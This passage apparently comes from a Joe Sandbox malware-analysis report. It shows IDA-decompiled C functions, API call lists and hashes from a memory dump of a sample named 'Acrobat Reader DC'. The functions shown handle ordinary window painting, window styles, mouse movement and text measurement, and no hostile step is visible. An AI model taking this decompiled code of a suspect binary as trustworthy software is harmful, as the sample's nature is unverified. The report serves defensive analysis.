                                  						E00408F40(_t115,  &_v40);
                                  						return 1;
                                  					}
                                  				} else {
                                  					_t61 =  *0x4a7f1c; // 0x0
                                  					if(_t61 == 0) {
                                  						goto L14;
                                  					} else {
                                  						if( *((char*)(_t61 + 0x40)) == 0) {
                                  							 *((short*)(_t61 + 0x48)) = 3;
                                  							 *((intOrPtr*)(_t61 + 0x50)) = _t87;
                                  							 *((short*)(_t61 + 0xa8)) = 3;
                                  							_t65 = GetLastError();
                                  							_t107 =  *0x4a7f1c; // 0x0
                                  							 *(_t107 + 0xb0) = _t65;
                                  							 *((short*)(_t107 + 0xb8)) = 3;
                                  							 *((intOrPtr*)(_t107 + 0xc0)) = E004348AA( *((intOrPtr*)(_a4 + 0xf4)));
                                  							if(_t116 != 0) {
                                  								_t115 = __imp__#10;
                                  								_v24 = 8;
                                  								_v16 = _t116[2];
                                  								 *_t115(_t107 + 0x78,  &_v24);
                                  								_t99 =  *0x4a7f1c; // 0x0
                                  								_v16 = _t116[4];
                                  								 *_t115(_t99 + 0x68,  &_v24);
                                  								_t101 =  *0x4a7f1c; // 0x0
                                  								_v16 = _t116[6];
                                  								 *_t115(_t101 + 0x88,  &_v24);
                                  								_t86 =  *0x4a7f1c; // 0x0
                                  								 *((short*)(_t86 + 0x98)) = 3;
                                  								 *(_t86 + 0xa0) = _t116[8];
                                  								 *((short*)(_t86 + 0xc8)) = 3;
                                  								_t104 =  *_t116 & 0x0000ffff;
                                  								if(_t104 == 0) {
                                  									_t120 = _t116[0xe];
                                  								} else {
                                  									_t120 = _t104;
                                  								}
                                  								 *(_t86 + 0xd0) = _t120;
                                  								_t126 = _t120;
                                  								if(_t120 != 0) {
                                  									_a12 = _t120;
                                  								}
                                  							}
                                  							E0040BC70( &_v56, _t126);
                                  							if(_a16 == 0) {
                                  								E0040E0A0( &_v56, E0044AF6C( &_v72, _a12));
                                  								E00402250( &_v72);
                                  								_a16 = _v56;
                                  							}
                                  							_t70 =  *0x4a7f1c; // 0x0
                                  							__imp__#9(_t70 + 0x58);
                                  							_t72 = _a16;
                                  							_t108 =  *0x4a7f1c; // 0x0
                                  							 *((short*)(_t108 + 0x58)) = 8;
                                  							__imp__#2(_t72);
                                  							_t93 =  *0x4a7f1c; // 0x0
                                  							 *((intOrPtr*)(_t93 + 0x60)) = _t72;
                                  							 *((intOrPtr*)( *((intOrPtr*)( *_t93 + 0x20))))();
                                  							E00402250( &_v56);
                                  						}
                                  						E00403C90( *((intOrPtr*)( *_a4 + 4)) + _a4, _t87, 0);
                                  						L13:
                                  						E00408F40(_t115,  &_v40);
                                  						return 0;
                                  					}
                                  				}
                                  			}




























                                  APIs
                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                  • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                  • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                  • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                  • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                  • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Variant$Copy$AllocClearErrorLastString
                                  • String ID:
                                  • API String ID: 960795272-0
                                  • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                  • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                  • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                  • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E00447BA8(void* __fp0, intOrPtr _a4) {
                                  				struct tagPAINTSTRUCT _v68;
                                  				struct tagRECT _v84;
                                  				struct tagPOINT _v92;
                                  				struct HWND__** _v104;
                                  				void* _v129;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t32;
                                  				signed int _t37;
                                  				signed int _t38;
                                  				struct HWND__** _t45;
                                  				struct HWND__* _t46;
                                  				void* _t51;
                                  				struct HWND__** _t55;
                                  				struct HWND__* _t57;
                                  				intOrPtr _t59;
                                  				struct HDC__* _t73;
                                  				struct HWND__* _t76;
                                  				signed int _t78;
                                  				void* _t80;
                                  				void* _t91;
                                  
                                  				_t91 = __fp0;
                                  				_t80 = (_t78 & 0xfffffff8) - 0x5c;
                                  				_t32 = E00430C09(_a4, 0x4a8630, _a4);
                                  				_t59 =  *0x4a8690; // 0x0
                                  				_t55 =  *( *(_t59 + _t32 * 4));
                                  				_t76 = _t55[0x73];
                                  				_v104 = _t55;
                                  				_t73 = BeginPaint( *_t55,  &(_v84.right));
                                  				while(_t76 != 0) {
                                  					_t37 =  *(_t76 + 8);
                                  					if(( *(_t37 + 0x8a) & 0x00000010) == 0 ||  *(_t37 + 0x8b) != 0xff) {
                                  						if(( *(_t37 + 0x8b) & 0x000000ff) == _t55[0x65]) {
                                  							goto L5;
                                  						}
                                  					} else {
                                  						L5:
                                  						_t38 = _t37 | 0xffffffff;
                                  						 *0x4a86f4 = _t38;
                                  						 *0x4a86f8 = _t38;
                                  						 *0x4a86ec = 0;
                                  						 *0x4a86e8 = 0;
                                  						 *0x4a86e4 = 0;
                                  						 *0x4a86f0 = 1;
                                  						GetWindowRect( *( *(_t76 + 8)),  &_v84);
                                  						_v92.x = _v84.left;
                                  						_v92.y = _v84.top;
                                  						ScreenToClient( *_t55,  &_v92);
                                  						SetViewportOrgEx(_t73, _v92, _v92.y, 0);
                                  						_t45 =  *(_t76 + 8);
                                  						_t57 = _t45[0x11];
                                  						_t46 = _t45[0x12];
                                  						if(_t57 < 0) {
                                  							L8:
                                  							if(_t46 != 0xffffffff || _t57 >= 0) {
                                  								goto L10;
                                  							}
                                  						} else {
                                  							if(_t46 != 0xffffffff) {
                                  								L10:
                                  								E0044719B(_t73, _t46, _t57, 0, 1);
                                  								Rectangle(_t73, 0, 0, ( *(_t76 + 8))[0x21], ( *(_t76 + 8))[0x21]);
                                  								E0042FD29(_t73, _t57);
                                  							} else {
                                  								_t46 = _t57;
                                  								goto L8;
                                  							}
                                  						}
                                  						_t51 = E0044734F(_t91, _t73, _t76);
                                  						E0044770D(_t73, _t73, _t76);
                                  						if(_t51 != 0) {
                                  							E004475CC(_t73, _t76, _t73, _t76);
                                  						}
                                  						_t55 =  *(_t80 + 0xc);
                                  					}
                                  					_t76 = _t76->i;
                                  				}
                                  				return EndPaint( *_t55,  &_v68);
                                  			}

























                                  APIs
                                  • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                  • GetWindowRect.USER32 ref: 00447C5D
                                  • ScreenToClient.USER32 ref: 00447C7B
                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                  • EndPaint.USER32(?,?), ref: 00447D13
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                  • String ID:
                                  • API String ID: 4189319755-0
                                  • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                  • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                  • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                  • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044900D(void* __ecx, void* __eflags, signed int _a4, long _a8) {
                                  				signed int _v8;
                                  				signed int _t32;
                                  				signed char _t39;
                                  				intOrPtr _t44;
                                  				intOrPtr _t49;
                                  				struct HWND__* _t53;
                                  				struct HWND__** _t58;
                                  
                                  				if(E00441AF5(0x4a8630, _a4,  &_a4,  &_v8) == 0) {
                                  					L16:
                                  					return 0;
                                  				} else {
                                  					_t44 =  *0x4a8690; // 0x0
                                  					_t49 =  *0x4a86a4; // 0xa71980
                                  					_a4 =  *((intOrPtr*)( *((intOrPtr*)(_t44 + _a4 * 4))));
                                  					_t58 =  *( *(_t49 + _v8 * 4));
                                  					_t53 =  *_t58;
                                  					_t39 = _t58[0x22];
                                  					E00432B92( &_a8);
                                  					_t32 = _t39 & 0x000000ff;
                                  					if(_t32 > 0x1b) {
                                  						goto L16;
                                  					} else {
                                  						_t13 = _t32 + 0x449159; // 0x0
                                  						switch( *((intOrPtr*)(( *_t13 & 0x000000ff) * 4 +  &M0044913D))) {
                                  							case 0:
                                  								L8:
                                  								__eax = _a4;
                                  								 *((intOrPtr*)(__esi + 0x48)) = _a8;
                                  								__eax = E00430B87(_a4, __esi, 1);
                                  								goto L9;
                                  							case 1:
                                  								__ecx = _a8;
                                  								__eax = SendMessageW(__edi, 0x409, 0, _a8);
                                  								goto L9;
                                  							case 2:
                                  								__eax = SendMessageW(__edi, 0x111e, 0, _a8);
                                  								goto L9;
                                  							case 3:
                                  								__ecx =  *(__esi + 0x30);
                                  								__eax = _a8;
                                  								 *((intOrPtr*)(__esi + 0x48)) = _a8;
                                  								__eax = InvalidateRect( *(__esi + 0x30), 0, 1);
                                  								goto L9;
                                  							case 4:
                                  								_t34 = SendMessageW(_t53, 0x1024, 0, _a8);
                                  								L9:
                                  								if( *0x49751c == 0 || _t39 != 8 && _t39 != 4 && _t39 != 0x1a && _t39 != 0x19) {
                                  									return 1;
                                  								} else {
                                  									return _t34 | 0xffffffff;
                                  								}
                                  								goto L17;
                                  							case 5:
                                  								__eax = GetWindowLongW(__edi, 0xfffffff0);
                                  								__eax = SetWindowLongW(__edi, 0xfffffff0, __eax);
                                  								goto L8;
                                  							case 6:
                                  								goto L16;
                                  						}
                                  					}
                                  				}
                                  				L17:
                                  			}











                                  APIs
                                  • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                  • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                  • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                  • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                  • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                  • SetWindowLongW.USER32 ref: 004490E1
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$LongWindow$InvalidateRect
                                  • String ID:
                                  • API String ID: 1976402638-0
                                  • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                  • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                  • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                  • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00440A0D(intOrPtr _a4, intOrPtr _a8, int _a12) {
                                  				struct HWND__*** _t56;
                                  				struct HWND__** _t57;
                                  				struct HWND__** _t63;
                                  				struct HWND__*** _t65;
                                  				struct HWND__** _t66;
                                  				struct HWND__** _t69;
                                  				intOrPtr _t72;
                                  				signed char _t80;
                                  				signed int _t90;
                                  				signed int _t91;
                                  				intOrPtr _t92;
                                  
                                  				_t72 = _a8;
                                  				_t92 = _a4;
                                  				_a8 =  *((intOrPtr*)(_t72 + 4));
                                  				if( *(_t72 + 0x194) == _a12) {
                                  					L14:
                                  					_t90 = 3;
                                  					if( *((intOrPtr*)(_t92 + 0x84)) < 3) {
                                  						L25:
                                  						return SendMessageW( *(_t72 + 0x18c), 0x130c, _a12, 0);
                                  					} else {
                                  						do {
                                  							_t56 =  *( *((intOrPtr*)(_t92 + 0x74)) + _t90 * 4);
                                  							if( *_t56 != 0) {
                                  								_t57 =  *_t56;
                                  								if(_t57[1] == _a8 && _t57[0x22] != 0xb && (_t57[0x22] & 0x000000ff) ==  *(_t72 + 0x194) && (_t57[0x22] & 0x00000020) == 0) {
                                  									ShowWindow( *_t57, 0);
                                  									ShowWindow( *( *( *( *((intOrPtr*)(_t92 + 0x74)) + _t90 * 4))), 4);
                                  									_t63 =  *( *( *((intOrPtr*)(_t92 + 0x74)) + _t90 * 4));
                                  									if((_t63[0x22] & 0x00000040) != 0 && _t63[0x22] == 0x1a) {
                                  										EnableWindow( *_t63, 1);
                                  									}
                                  								}
                                  							}
                                  							_t90 = _t90 + 1;
                                  						} while (_t90 <=  *((intOrPtr*)(_t92 + 0x84)));
                                  						goto L25;
                                  					}
                                  				}
                                  				_t91 = 3;
                                  				if( *((intOrPtr*)(_t92 + 0x84)) < 3) {
                                  					L13:
                                  					 *(_t72 + 0x194) = _a12;
                                  					goto L14;
                                  				} else {
                                  					goto L2;
                                  				}
                                  				do {
                                  					L2:
                                  					_t65 =  *( *((intOrPtr*)(_t92 + 0x74)) + _t91 * 4);
                                  					if( *_t65 != 0) {
                                  						_t66 =  *_t65;
                                  						if(_t66[1] == _a8 && _t66[0x22] != 0xb) {
                                  							_t80 = _t66[0x22];
                                  							if((_t80 & 0x000000ff) ==  *(_t72 + 0x194) ||  *((char*)(_t72 + 0x19c)) != 0 && _t80 != 0xff && _t66[0x22] != 0xa) {
                                  								ShowWindow( *_t66, 0);
                                  								_t69 =  *( *( *((intOrPtr*)(_t92 + 0x74)) + _t91 * 4));
                                  								if((_t69[0x22] & 0x00000040) != 0 && _t69[0x22] == 0x1a) {
                                  									EnableWindow( *_t69, 0);
                                  								}
                                  							}
                                  						}
                                  					}
                                  					_t91 = _t91 + 1;
                                  				} while (_t91 <=  *((intOrPtr*)(_t92 + 0x84)));
                                  				goto L13;
                                  			}















                                  APIs
                                  • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                  • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                  • ShowWindow.USER32(?,00000000), ref: 00440B18
                                  • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                  • EnableWindow.USER32(?,00000001), ref: 00440B50
                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$Show$Enable$MessageSend
                                  • String ID:
                                  • API String ID: 642888154-0
                                  • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                  • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                  • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                  • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E00441FD6(void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				struct tagRECT _v32;
                                  				char _v36;
                                  				long _v40;
                                  				long _v44;
                                  				intOrPtr _v48;
                                  				signed int _t59;
                                  				long _t68;
                                  				long _t72;
                                  				long _t91;
                                  				long _t96;
                                  				signed int _t98;
                                  				void* _t100;
                                  				void* _t101;
                                  
                                  				_t105 = __fp0;
                                  				_t100 = (_t98 & 0xfffffff8) - 0x2c;
                                  				_t72 = _a16;
                                  				E0043137E( *((intOrPtr*)(_a4 + 0x100)),  &_v36, GetForegroundWindow());
                                  				GetWindowRect(GetDesktopWindow(),  &_v32);
                                  				asm("cdq");
                                  				_t96 = (_a8 + _v48 + 1 << 0x10) / _v32.right - 1;
                                  				asm("cdq");
                                  				_t59 = (_a12 + _v44 + 1 << 0x10) / _v32.bottom;
                                  				_t91 = _t59 - 1;
                                  				if(_t72 != 0) {
                                  					if(__eflags <= 0) {
                                  						L6:
                                  						_t72 = 0xa;
                                  						L7:
                                  						GetCursorPos( &(_v32.top));
                                  						asm("cdq");
                                  						_v40 = _v32.top.x * 0xffff / (_v12 - 1) + 1;
                                  						asm("cdq");
                                  						_t68 = _v32.right * 0xffff / (_v8 - 1) + 1;
                                  						__eflags = _t68;
                                  						_v44 = _t68;
                                  						while(1) {
                                  							_t59 = E0043326F(_t96, _t91, _t72, 0x20,  &_v40,  &_v44);
                                  							_t101 = _t100 + 0x18;
                                  							__eflags = _t59;
                                  							if(_t59 == 0) {
                                  								break;
                                  							}
                                  							mouse_event(0x8001, _v40, _v44, 0, 0);
                                  							_push(0xa);
                                  							E004331A2(_t59, _t105);
                                  							_t100 = _t101 + 4;
                                  						}
                                  						L3:
                                  						return _t59;
                                  					}
                                  					__eflags = _t72 - 0x64;
                                  					if(_t72 <= 0x64) {
                                  						goto L7;
                                  					}
                                  					goto L6;
                                  				}
                                  				mouse_event(0x8001, _t96, _t91, _t72, _t72);
                                  				if(_a20 != _t72) {
                                  					_push(0xa);
                                  					_t59 = E004331A2(_t59, __fp0);
                                  				}
                                  				goto L3;
                                  			}



















                                  APIs
                                  • GetForegroundWindow.USER32 ref: 00441FEB
                                    • Part of subcall function 0043137E: GetWindowRect.USER32 ref: 00431399
                                  • GetDesktopWindow.USER32 ref: 00442013
                                  • GetWindowRect.USER32 ref: 0044201A
                                  • mouse_event.USER32 ref: 00442049
                                    • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                  • GetCursorPos.USER32(?,?,?), ref: 00442078
                                  • mouse_event.USER32 ref: 004420E4
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                  • String ID:
                                  • API String ID: 4137160315-0
                                  • Opcode ID: c5ebc6bffcea8891df72ff2766fe98ff5e780c8f2d9f97d85ba0139f445d3039
                                  • Instruction ID: 269498413448c1b0457bf7b9883effbdcf17ebc276120b60b0d95eb2daedcabf
                                  • Opcode Fuzzy Hash: c5ebc6bffcea8891df72ff2766fe98ff5e780c8f2d9f97d85ba0139f445d3039
                                  • Instruction Fuzzy Hash: FA31A372104306AFE710CF54CD85E6BB7E9FF98304F00092DF94597281E6B5EA05CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E00441078(void* __ebx, void* __esi, long _a4, long _a8, signed int _a12) {
                                  				signed int _t18;
                                  				long _t21;
                                  				signed int _t24;
                                  				void* _t32;
                                  				struct HWND__** _t33;
                                  				intOrPtr _t36;
                                  				long _t40;
                                  				void* _t42;
                                  				struct HWND__* _t43;
                                  
                                  				_t42 = __esi;
                                  				_t32 = __ebx;
                                  				_t17 = _a12;
                                  				_t40 = _a4;
                                  				if(_a12 == 0) {
                                  					_t18 =  *0x4a869c; // 0xffffffff
                                  				} else {
                                  					_t18 = E00430C09(_t17, 0x4a8630, _t17);
                                  					 *0x4a869c = _t18;
                                  				}
                                  				if(_t18 != 0xffffffff) {
                                  					_t36 =  *0x4a8690; // 0x0
                                  					_push(_t32);
                                  					_t33 =  *( *(_t36 + _t18 * 4));
                                  					_push(_t42);
                                  					_t43 =  *_t33;
                                  					_a12 = 0 | (GetWindowLongW(_t43, 0xfffffff0) & 0x00c00000) == 0x00c00000;
                                  					if(_t40 == 0xffffffff || SetWindowLongW(_t43, 0xfffffff0, _t40) != 0) {
                                  						_t21 = _a8;
                                  						if(_t21 == 0xffffffff || SetWindowLongW(_t43, 0xffffffec, _t21) != 0) {
                                  							if(_t33[0xe] != 0) {
                                  								_t24 = 0 | (_t40 & 0x00c00000) == 0x00c00000;
                                  								if(_a12 != _t24) {
                                  									_push(4);
                                  									if(_t24 == 0) {
                                  										_t33[0x12] = _t33[0x12] - GetSystemMetrics();
                                  									} else {
                                  										_t33[0x12] = _t33[0x12] + GetSystemMetrics();
                                  									}
                                  								}
                                  								SetWindowPos(_t43, 0, 0, 0, 0, 0, 0x47);
                                  							}
                                  							return 1;
                                  						} else {
                                  							goto L6;
                                  						}
                                  					} else {
                                  						L6:
                                  						return 0;
                                  					}
                                  				} else {
                                  					return 0;
                                  				}
                                  			}













                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                  • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                  • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                  • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044389A(void* __ecx, void* __eflags, struct HDC__* _a4, intOrPtr _a8, signed int _a12) {
                                  				long _v12;
                                  				char _v20;
                                  				void* __edi;
                                  				void* _t23;
                                  				int _t29;
                                  				long _t31;
                                  				void* _t33;
                                  				signed int _t34;
                                  				void* _t35;
                                  				char _t39;
                                  				WCHAR* _t40;
                                  				struct tagSIZE* _t41;
                                  				void* _t42;
                                  				void* _t43;
                                  				void* _t44;
                                  				void* _t45;
                                  
                                  				_t46 = __eflags;
                                  				_t35 = __ecx;
                                  				_t41 = _a12;
                                  				E0043652F(_t46,  &_v20, E00410160(_a8, __eflags));
                                  				_t39 = _v20;
                                  				_t34 = 0;
                                  				_t41->cy = 0;
                                  				_t41->cx = 0;
                                  				_v12 = 0;
                                  				_a12 = 1;
                                  				_t23 = E004111C1(_t39);
                                  				_t43 = _t42 + 4;
                                  				if(_t23 != 0) {
                                  					do {
                                  						if( *((short*)(_t39 + _t34 * 2)) == 0xa) {
                                  							_a12 = _a12 + 1;
                                  						}
                                  						_t34 = _t34 + 1;
                                  						_t33 = E004111C1(_t39);
                                  						_t43 = _t43 + 4;
                                  						_t50 = _t34 - _t33;
                                  					} while (_t34 < _t33);
                                  				}
                                  				_t40 = E00413EB8(_t35, _t50, _t39, L"\r\n");
                                  				_t44 = _t43 + 8;
                                  				while(_t40 != 0) {
                                  					_t29 = E004111C1(_t40);
                                  					_t36 = _a4;
                                  					_t45 = _t44 + 4;
                                  					GetTextExtentPoint32W(_a4, _t40, _t29, _t41);
                                  					_t31 = _t41->cx;
                                  					_t52 = _t31 - _v12;
                                  					if(_t31 > _v12) {
                                  						_v12 = _t31;
                                  					}
                                  					_t40 = E00413EB8(_t36, _t52, 0, L"\r\n");
                                  					_t44 = _t45 + 8;
                                  				}
                                  				_t41->cy = _t41->cy * _a12;
                                  				_t41->cx = _v12;
                                  				return E00436508( &_v20);
                                  			}




















                                  APIs
                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                  • _wcslen.LIBCMT ref: 004438CD
                                  • _wcslen.LIBCMT ref: 004438E6
                                  • _wcstok.LIBCMT ref: 004438F8
                                  • _wcslen.LIBCMT ref: 0044390C
                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                  • _wcstok.LIBCMT ref: 00443931
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                  • String ID:
                                  • API String ID: 3632110297-0
                                  • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                  • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
